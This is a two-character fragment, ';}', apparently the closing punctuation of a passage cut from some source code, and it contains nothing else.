;}